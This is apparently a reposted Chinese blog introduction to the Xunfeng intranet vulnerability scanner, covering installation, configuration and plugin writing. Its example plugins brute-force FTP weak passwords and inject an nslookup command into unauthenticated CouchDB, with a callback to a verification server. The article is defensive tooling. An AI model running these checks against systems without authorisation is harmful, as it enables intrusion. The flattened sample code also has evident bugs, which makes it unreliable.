巡风漏扫系统介绍与安装
为什么80%的码农都做不了架构师?>>>
巡风
巡风是一款适用于企业内网的漏洞快速应急、巡航扫描
系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。
本软件只做初步探测,无攻击性行为。请使用者遵守《中华人民共和国网络安全法》,勿将巡风用于非授权的测试,YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。
其主体分为两部分:网络资产识别引擎
,漏洞检测引擎
。
网络资产识别引擎会通过用户配置的IP范围定期自动
的进行端口探测(支持调用MASSCAN),并进行指纹识别,识别内容包括:服务类型、组件容器、脚本语言、CMS。
漏洞检测引擎会根据用户指定的任务规则
进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。
安装指南
国内镜像 https://code.aliyun.com/ysrc/xunfeng.git
- Windows 安装指南
- OSX 安装指南
- Linux 安装指南
- Docker 安装指南
- Linux 一条命令安装
配置指南
- 在配置-爬虫引擎-网络资产探测列表 设置内网IP段**(必须配置,否则无法正常使用,每个IP段最大限制为10个B段)**。
- 在配置-爬虫引擎-资产探测周期 设置计划规则。
- 可启用MASSCAN(探测范围为全端口)代替默认的端口探测脚本,需安装好MASSCAN后配置程序完整绝对路径,点击开启即可完成切换。 MASSCAN需chmod +x 给执行权限,并手动执行确保可正常运行后再开启。
- 其他配置根据自身需要进行修改。
插件编写
漏洞插件支持2种类型,json标示与python脚本,可以通过官方推送渠道安装或者自行添加。
JSON标示符
Python脚本
插件标准非常简洁,只需通过 get_plugin_info
方法定义插件信息,check
函数检测漏洞即可。
# coding:utf-8import ftplibdef get_plugin_info(): # 插件描述信息plugin_info = {"name": "FTP弱口令","info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。","level": "高危","type": "弱口令","author": "wolf@YSRC","url": "","keyword": "server:ftp", # 推荐搜索关键字}return plugin_infodef check(ip, port, timeout): # 漏洞检测代码user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web']for user in user_list:for pass_ in PASSWORD_DIC: # 密码字典无需定义,程序会自动为其赋值。pass_ = str(pass_.replace('{user}', user))try:ftp = ftplib.FTP()ftp.timeout = timeoutftp.connect(ip, port)ftp.login(user, pass_)if pass_ == '': pass_ = 'null'if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录"return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) # 成功返回结果,内容显示在扫描结果页面。except:pass
此外系统内嵌了辅助验证功能:
DNS:触发,nslookup randomstr IP,验证, http://ip:8088/randomstr ,返回YES即存在。
HTTP:触发,http://ip:8088/add/randomstr ,验证, http://ip:8088/check/randomstr ,返回YES即存在。
使用例子:
import urllib2
import random
import socketdef get_plugin_info(): # 插件描述信息plugin_info = {"name": "CouchDB未授权访问","info": "导致敏感信息泄露,攻击者可通过控制面板执行系统命令,导致服务器被入侵。","level": "高危","type": "未授权访问","author": "wolf@YSRC","url": "","keyword": "server:couchdb", # 推荐搜索关键字}def get_ver_ip(ip):csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)csock.connect((ip, 80))(addr, port) = csock.getsockname()csock.close()return addrdef random_str(len):str1=""for i in range(len):str1+=(random.choice("ABCDEFGH1234567890"))return str(str1)def check(ip,port,timeout):rand_str = random_str(8)cmd = random_str(4)server_ip = get_ver_ip()req_list = [["/_config/query_servers/%s"%(cmd),'"nslookup %s %s>log"'%(rand_str,server_ip)],["/vultest123",''],["/vultest123/test",'{"_id":"safetest"}']]for req_info in req_list:try:request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout)request.get_method = lambda: 'PUT'urllib2.urlopen(request)except:passtry:req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s","map":""}'%(cmd))req_exec.add_header("Content-Type","application/json")urllib2.urlopen(req_exec)except:passcheck = urllib2.urlopen("http://%s:8088/%s"%(server_ip,rand_str)).read()if 'YES' in check:return u"未授权访问"
流程演示视频
文件结构
│ Config.py # 配置文件
│ README.md # 说明文档
│ Run.bat # Windows启动服务
│ Run.py # webserver
│ Run.sh # Linux启动服务,重新启动前需把进程先结束掉
│
├─aider
│ Aider.py # 辅助验证脚本
│
├─db # 初始数据库结构
│
├─masscan # 内置编译好的Masscan程序(CentOS win64适用),需要chmod+x给执行权限(root),若无法使用请自行编译安装。
├─nascan
│ │ NAScan.py # 网络资产信息抓取引擎
│ │
│ ├─lib
│ │ common.py 其他方法
│ │ icmp.py # ICMP发送类
│ │ log.py # 日志输出
│ │ mongo.py # 数据库连接
│ │ scan.py # 扫描与识别
│ │ start.py # 线程控制
│ │
│ └─plugin
│ masscan.py # 调用Masscan脚本
│
├─views
│ │ View.py # web请求处理
│ │
│ ├─lib
│ │ Conn.py # 数据库公共类
│ │ CreateExcel.py # 表格处理
│ │ Login.py # 权限验证
│ │ QueryLogic.py # 查询语句解析
│ │
│ ├─static #静态资源目录
│ │
│ └─templates #模板文件目录
│
└─vulscan│ VulScan.py # 漏洞检测引擎│└─vuldb # 漏洞库目录
转载于:https://my.oschina.net/OneNb/blog/2984016
巡风漏扫系统介绍与安装相关推荐
- 巡风漏扫系统搭建(docker)
docker方式安装巡风系统[基于CentOS7.6] # yum update # curl -sSL https://get.docker.com/ | sh # yum install git ...
- Open VAS 漏扫工具的安装
wget -q -O - http://www.atomicorp.com/installers/atomic |sh .安装openvas [root@localhost ~]#yum -y ins ...
- Nessus 漏扫工具的安装(保姆级)
Nessus介绍 1998 年,Nessus 的创办人 Renaud Deraison 展开了一项名为"Nessus"的计划,其计划目的是 希望能为互联网社群提供一个免费.威力强大 ...
- Web安全—Web漏扫工具Nikto安装与使用
本文仅用于安全学习使用!切勿非法用途. 一.Nikto工具简介 Nikto 是一个开源 (GPL) Web服务器扫描程序,它针对Web服务器执行多项综合测试,包括 6700 多个潜在危险文件/CGIs ...
- (转)Ubuntu 17.04_64上搭建巡风扫描系统(资产信息漏洞扫描内网神器)
巡风简介 巡风是一款适用于企业内网的漏洞快速应急.巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表.其主体分为两部分:网络资产识别 ...
- Kali上巡风扫描器的安装和使用
去年同程SRC发布了巡风扫描系统,用于内网资产发现和漏洞扫描,受到众多大牛的推荐. 原理 1.依赖masscan扫描,进行资产发现和指纹识别,获得banner信息之后,进行正则匹配,入库,前台展现扫描 ...
- windows10安装巡风
看了好多人写的还有官方文档,也试了好长时间就是不成功.想爆粗口,成功之后记录一下.基本官方教程可以装成功为啥我之前还要配置数据库.大家不要做多余的操作. 一.环境安装 1.操作系统依赖 由于默认的ku ...
- 巡风 win7 python3.7安装使用记录
巡风是一款适用于企业内网的漏洞快速应急.巡航扫描系统,只做初步探测,无攻击性行为. 其主体分为两部分:网络资产识别引擎,漏洞检测引擎. 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测( ...
- 安全漏扫Nessus软件使用,安装
一.安装 官方下载专业试用版: 输入产品的code:4510-EDD5-AA12-B217-500B,初始化完成后会自动跳转到登陆页面. 或者直接访问https://zh-cn.tenable.com ...
最新文章
- org.hibernate.hibernate.connection.release_mode
- redhat替换yum源时redhat.repo无法删除或禁用的问题
- ibatis学习笔记
- 【深搜】 棋盘 【NOIp普及组 2017 第三题】 (luogu 3956/ssl 2851)
- c语言 整型转bool,C语言的布尔类型(_Bool)【转】
- Java8新特性总结 -6.Date/Time API
- android 音频设备类型,实现车载音频 HAL | Android 开源项目 | Android Open Source Project...
- 免费好用的钉钉内网穿透
- SQL 数据库 学习 004 预备知识
- [LINUX服務器搭建套餐]2.安裝mysql
- Python的mpl_finance模块从2020年已经提醒弃用,新mplfinance模块详解(一)
- 我会java什么梗_抖音不会真的有人什么梗 不会真的有人不会吧不会吧别恶心我梗意思及出处...
- 如何用计算机产生随机数,如何在计算器产生随机数
- studio 3t注册码脚本
- 联想笔记本打字不显示选字框
- OpenCV4.5.2(+opencv_contrib)+CMake3.20.1+vs2017重新编译
- Windows 下安装 Xdebug 受难记之(3)
- 赛题类型 Web、Crypto、Pwn、Reverse、Misc 各是指什么意思?
- 埋头工作就能触及 “ 宇宙真理 ”
- 实际开发中 React-Hooks 到底用得多吗?